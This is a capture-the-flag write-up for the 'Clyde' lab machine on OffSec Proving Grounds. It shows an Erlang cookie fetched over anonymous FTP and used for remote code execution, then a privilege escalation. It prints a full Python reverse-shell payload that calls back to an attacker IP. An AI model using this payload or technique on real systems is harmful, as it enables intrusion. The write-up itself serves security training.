Clyde
Writeup for Clyde from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.141.68 all
Service Enumeration
HTTP (Port 80)
Doesn't look like there's much here, but we run gobuster either ways to see if we find anything interesting.
Hmmm...seems like a dead-end, lets see what else we can find on other ports.
Erlang Port Mapper Daemon (Port 4369)
The erlang port mapper daemon is used to coordinate distributed erlang instances which keeps track of which node name listens on which address.
A quick google search and we find out that if we are able to find the authentication cookie on this machine, we can get RCE. Let's note down the cookie name to be .erlang.cookie
HTTP (Port 15672)
We try to log in using the default credentials guest:guest but are unsuccessful.
FTP (Port 21)
Since anonymous login is allowed, we can see what files are available here. We immediately notice the rabitmqdirectory which is the CMS running on port 15672.
When we enter this directory and list its contents, we see that there is the file .erlang.cookie which can be used to gain RCE through Erlang Port Mapper Daemon Exploit.
We download .erlang.cookie to our attack machine.
Exploit
First, we make changes in the script on lines 22-24 to specify the target and cookie value. We can then change the CMD variable to any command we want.
We first check if there is python on this target so we can use python to get our reverse shell.
Seem like there's python so we can use python to get our reverse shell. Note that we have to use the escape character as there are many quotation marks used.
Payload: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.141",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
Privesc
Running LinEnum on the target, we notice an interesting SUID file.
And we got root!
Last updated
